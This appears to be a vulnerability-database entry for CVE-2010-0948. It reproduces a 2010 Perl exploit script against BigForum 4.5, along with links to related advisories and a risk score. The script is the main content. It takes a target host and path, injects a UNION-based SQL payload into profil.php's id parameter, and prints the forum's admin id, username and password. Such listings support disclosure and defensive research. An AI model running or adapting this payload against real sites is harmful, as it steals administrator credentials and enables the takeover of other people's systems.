Lucene search
+L

BigForum 4.5 - SQL Injection

🗓️ 07 Mar 2010 00:00:00Reported by CtacokType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 19 Views

BigForum Version: 4.5 SQL Injection. Exploits admin login details

Related
Code
ReporterTitlePublishedViews
Family
Circl
CVE-2010-0948
7 Mar 201000:00
circl
CVE
CVE-2010-0948
9 Mar 201020:00
cve
Cvelist
CVE-2010-0948
9 Mar 201020:00
cvelist
EUVD
EUVD-2010-0973
7 Oct 202500:30
euvd
NVD
CVE-2010-0948
10 Mar 201020:14
nvd
OpenVAS
Bigforum 'profil.php' SQL Injection Vulnerability
18 Mar 201000:00
openvas
Prion
Sql injection
10 Mar 201020:14
prion
#!/usr/bin/perl

use LWP::Simple;

print "\n";

print "##############################################################\n";

print "# BigForum Version: 4.5 SQL INJECTION                        #\n";

print "# Author: Ctacok  (Russian)                                  #\n";

print "# Blog : www.Ctacok.ru                                       #\n";

print "# Special for Antichat (forum.antichat.ru) and xakep.ru      #\n";

print "# Require : Magic_quotes = Off                               #\n";

print "##############################################################\n";

if (@ARGV < 2)

{

print "\n Usage: exploit.pl [host] [path] ";

print "\n EX : exploit.pl www.localhost.com /path/ \n\n";

exit;

}

$host=$ARGV[0];

$path=$ARGV[1];

$vuln = "-1'+union+select+1,concat(0x3a3a3a,id,0x3a,username,0x3a,pw,0x3a3a3a),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29+from+users";

$doc = get($host.$path."profil.php?id=".$vuln."+--+");

if ($doc =~ /:::(.+):(.+):(.+):::/){

         print "\n[+] Admin id: : $1";

print "\n[+] Admin username: $2";

print "\n[+] Admin password: $3";

}

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

07 Mar 2010 00:00Current
5.8Medium risk
Vulners AI Score5.8
CVSS 26.8
EPSS0.01091
19